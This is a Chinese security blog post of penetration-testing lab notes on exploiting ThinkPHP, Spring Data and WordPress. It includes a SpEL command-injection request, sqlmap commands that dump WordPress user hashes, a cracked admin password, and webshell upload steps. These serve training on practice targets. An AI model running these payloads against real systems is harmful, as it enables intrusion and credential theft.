第43天-漏洞发现-WEB应用之漏洞探针类型利用修复

已于 2022-04-05 21:33:32 修改
阅读量5k 收藏 3
点赞数
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: web安全 安全 测试工具
于 2022-04-05 15:59:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/123970759
版权

思维导图

在这里插入图片描述

相关概念

已知 CMS

如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的
是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用
白盒代码审计自行挖掘。

开发框架

如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对
应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审
计自行挖掘。

未知 CMS

如常见的企业或个人内部程序源码,也可以是某 CMS 二次开发的源码结构,针对此类的源码程序测
试思路:能识别二次开发就按已知 CMS 思路进行,不能确定二次开发的话可以采用常规综合类扫描
工具或脚本进行探针,也可以采用人工探针(功能点,参数,盲猜),同样在有源码的情况下也可以
进行代码审计自行挖掘

演示案例:

开发框架类源码渗透测试报告-资讯-thinkphp,spring

thinkphp

在这里插入图片描述

输入错误url,报错显示Thinkphp版本

在这里插入图片描述

同样

在这里插入图片描述

在这里插入图片描述

spring

vulhub靶场

在这里插入图片描述

在这里插入图片描述

payload

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

在这里插入图片描述

已知 CMS 非框架类渗透测试报告-工具脚本-wordpress

靶场地址https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe

采用WordPress CMS

在这里插入图片描述

wpscan 扫描

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

构造链接

http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a

使用sqlmap快开始跑

python sqlmap.py -u "http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" --dbs

在这里插入图片描述

python sqlmap.py -u "http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" -D "test" --tables

在这里插入图片描述

python sqlmap.py -u "http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" -D "test" -T "wp_users --columns

在这里插入图片描述

python sqlmap.py -u "http://124.70.71.251:47438/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" -D "test" -T "wp_users" -C "user_login,user_pass" --dump

在这里插入图片描述

admin

$P$Bj8Pp.mH8GIjcXQqp1ZuyRw7i4oV72.

md5 查询 ————————》12qwaszx

在这里插入图片描述

查一下后台地址,登录后台

在这里插入图片描述

在插件中添加一句话小马

在这里插入图片描述

在这里插入图片描述

蚁剑连接

http://124.70.71.251:47438/wp-admin/plugin-editor.php?file=comment-rating/comment-rating.php

在这里插入图片描述

在这里插入图片描述

获取到key

mozheaac6be9855cd7bd73e3af588587

已知 CMS 非框架类渗透测试报告-代码审计-qqyewu_php

分析~~~

在这里插入图片描述

未知 CMS 非框架类渗透测试报告-人工-你我都爱的 wg 哦~

实战

DedeCMS
查看版本信息
/data/ admin/ver.txt
默认后殆
/dede
爆后台路径
/data/mysql_error_trace.inc

弱口令
扫端口nmap -sV
后台备份文件压缩包

涉及资源:

https://vulhub.org/
https://wpvulndb.com/users/sign_up
https://github.com/wpscanteam/wpscan
https://github.com/ajinabraham/CMSScan
https://pan.baidu.com/s/1KCa-5gU8R8jPXYY19vyvZA 提取码:xiao
https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe

IsecNoob
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网站空间探针
11-08
WEB探针,RAR压缩包,里面包括了四种不同语言的探针,包括:asp\asp.net\php\jsp
网页探针webSpy2.0 2.7
09-16
一个免费、开源、绿色免安装的web开发必备辅助工具,可以方便的查看页面任意对象的HTML源码、CSS样式,支持框架穿透模式,可自动生成模拟控制代码支持框架穿透。   支持跨域框架探测、自动化控制。   自动捕获弹出窗体。   自动生成自动化控制代码,自动还原滚动条,可实时测试运行。   点击“相关”按钮,可查询当前探测对象的帮助文档,列出对象的属性、方法。
漏洞发现-web应用发现探针类型利用43
san3144393495的博客
08-30 1081
如常见的dedecms,discuz,wordpress等源码结构,这些都是网上比较知名的php源码的cms的名称,这是我们在国内常见的几个程序,论坛discuz,博客wordpress是很常见的;他们都有个特性,他们的源码是在网上可以下载到的,我们都可以去用他的源码去搭建网站,我称之为cms;开发框架是对面程序的整体或者核心是用这个框架支撑的,框架以及提前给写好了,框架就跟开发引用的模块一样,比如一个文件上传,不用框架就一个一个代码写,用框架就直接引用框架,框架就是封装好的功能代码,
43 漏洞发现-WEB应用漏洞探针类型利用修复
最新发布
山兔的博客
01-26 955
漏扫能扫出来的工具,网上早就公开了,大部分网上公开漏洞,都是通过网站的代码分析到的,我们知道cms结构之后,思路直接跳到工具框架这里来,不要直接用漏扫去扫,在网上找它的漏洞就完事了,因为检测工具有漏洞,网站绝对有,如果网站没有,漏扫也绝对不会扫出来,扫出来的大部分是误报。有的在网上有直接的利用工具,我们直接利用,有的没有,那就利用网上的相关资讯,复现的过程,漏洞的介绍,再寻找利用的文章,按步就搬的来就完事了。
操作系统之漏洞探针类型利用修复web
m0_61786761的博客
09-01 594
4.cms和框架的区别:cms就是将网站的栏目和模型全部开发好了,用户可以直接使用,它是傻瓜级操作,而框架只是面向程序员的,普通用户是用不了的,因为看不懂。已知cms:漏洞平台:cnvd,seebug,1337day,exploit-db,packet storm security。1.主机漏洞发现工具:goby , nmap , nessus , openvas , nexpose。3.利用:工具框架:metasploit , searchsploit , 企业单位内部产品。5.代码审计:(未知cms)
43漏洞发现-WEB应用漏洞探针类型利用修复1
08-03
本篇主要探讨了针对不同类型Web应用漏洞探针利用修复方法,包括对已知CMS、开发框架以及未知CMS的处理策略。 1. **已知内容管理系统(CMS)的漏洞检测** - 常见的如dedecms、discuz和wordpress等,这类CMS通常...
第42漏洞发现-操作系统之漏洞探针类型利用修复1
08-03
漏洞发现-操作系统之漏洞探针类型利用修复演示案例:Goby 忍者系统测试默认 nse 插件Nmap vulscan vulners 调用第三方库探针Nessus
第47:WAF绕过-漏洞发现之代理池指纹被动探针1
08-03
1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪造模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等)
行业分类-设备装置-垂直式探针卡及应用其的检测模块.zip
08-23
行业分类-设备装置-垂直式探针卡及应用其的检测模块.zip
测试硬件简介---探针卡(prober card)
12-09
探针卡(prober card) 是晶圆测试(wafer test)中被测芯片和测试机之间的接口.探针卡对前期测试的开发及后期量产测试的良率的保证都非常重要.一.下面介绍一常见的几类探针卡。1.Blade Type : Under 70 pins,low speed...
漏洞发现-WEB 应用漏洞探针类型利用修复
硫酸超的博客
09-19 400
漏洞发现-WEB 应用漏洞探针类型利用修复 已知 CMS 如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的 是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用 白盒代码审计自行挖掘。 开发框架 如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对 应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审 计自行
浏览器探针--JavaScript
李刚的学习专栏
06-30 9377
在开发中,我们经常会遇到需要判断操作平台和浏览器类型的问题。HTTP规范(包括1.0和1.1版)明确规定,浏览器应该发送简短的用户代理字符串,指明浏览器的名称和版本号。 RFC 2616 (即HTTP1.1协议规范)是这样描述用户代理字符串的: “产品标识符常用于通信应用程序标识自身,由软件名和版本组成。使用产品标识符的大多数领域也允许列出作为应用程序主要部分的子产品,由空格分隔。按照惯例,
JSP探针
passport_daizi的博客
04-10 1276
<%! String tblWidth = "700"; String tblAlign = "center"; String strOS =System.getProperty("os.name"); private String getIp() { String strTmp=""; try { strTmp =InetAddress.getLocalHost().ge
带api的php探针,从零开始搭建前端监控系统(一)——web探针sdk
weixin_39706441的博客
04-12 290
前言本系列文章旨在讲解如何从零开始搭建前端监控系统。项目已经开源项目地址:您的支持是我们不断前进的动力。喜欢请start!!!喜欢请start!!!喜欢请start!!!本文是该系列第一篇,web探针sdk的设计与开发,重点讲解sdk包含的功能与实现。功能上报pv uv捕获error上报性能performance上报用户轨迹支持单页面hack ajax fetch上报加载的资源hack conso...
【小迪安全web安全|渗透测试|网络安全 | 学习笔记-7
youngerll的博客
01-02 5675
【小迪安全web安全|渗透测试|网络安全 | 学习笔记-7
漏洞发现-2】WEB应用漏洞探针类型利用修复
qq_41889600的博客
12-16 256
小迪安全 漏洞探针
漏洞发现-操作系统之漏洞探针类型利用修复
xhscxj的博客
02-12 721
探针
阿江asp 探针 v 1.93 -
09-04
阿江ASP探针v1.93是一个用于网站服务器的诊断工具。它可以帮助网站管理员监测服务器的性能和状态,提供关于服务器的详细信息。 该探针可以通过浏览器访问,并提供了一个用户友好的界面和图形化显示结果。它可以显示服务器的操作系统信息、PHP版本、数据库版本等基本信息。此外,它还可以提供关于服务器的硬盘空间、内存使用情况和网络连接等更详细的信息。 阿江ASP探针v1.93还具备一些实用的功能。例如,它可以显示当前正在运行的进程列表、打开的文件列表以及对数据库的连接情况。这些信息对于管理员来说是很有用的,能够帮助管理员及时发现并解决潜在的问题。 此外,阿江ASP探针v1.93还提供了一些系统设置的选项,允许管理员进行一些基本的系统配置。例如,管理员可以通过探针来修改PHP配置文件或重启服务器等操作。 总的来说,阿江ASP探针v1.93是一个功能强大的网站服务器诊断工具。它能够提供详细的服务器信息,并帮助管理员监控服务器的性能和状态。通过使用该探针,管理员可以及时发现并解决服务器中的问题,保障网站的正常运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值